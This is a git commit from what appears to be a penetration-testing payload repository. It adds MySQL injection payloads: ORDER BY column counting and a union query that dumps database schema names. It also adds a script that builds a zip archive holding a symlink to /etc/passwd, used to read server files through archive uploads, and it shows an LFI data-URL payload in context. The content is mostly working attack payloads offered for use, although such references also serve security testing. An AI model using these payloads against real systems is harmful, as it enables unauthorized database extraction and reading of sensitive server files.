Symbolic Link Zip + SQL injection ORDER BY

2017-07-04 23:17:59 +02:00 · 2017-07-04 23:17:59 +02:00 · 6070ece522
parent a1fbd41bbb
commit 6070ece522
4 changed files with 16 additions and 3 deletions
--- a/include/README.md
+++ b/include/README.md
@ -51,4 +51,5 @@ http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbm
 ```

 ## Thanks to
-* https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
+* [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
+* [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/)
--- a/injection/MySQL
+++ b/injection/MySQL
@ -1,5 +1,15 @@
 # MYSQL Injection

+##Detect columns number
+Using a simple ORDER
+```
+order by 1
+order by 2
+order by 3
+...
+order by XXX
+```
+
 ##MySQL Union Based
 ```
 UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
--- a/Link/etc_passwd.zip
+++ b/Link/etc_passwd.zip
--- a/Link/generate.sh
+++ b/Link/generate.sh
@ -0,0 +1,2 @@
+ln -s /etc/passwd link
+zip --symlinks test.zip link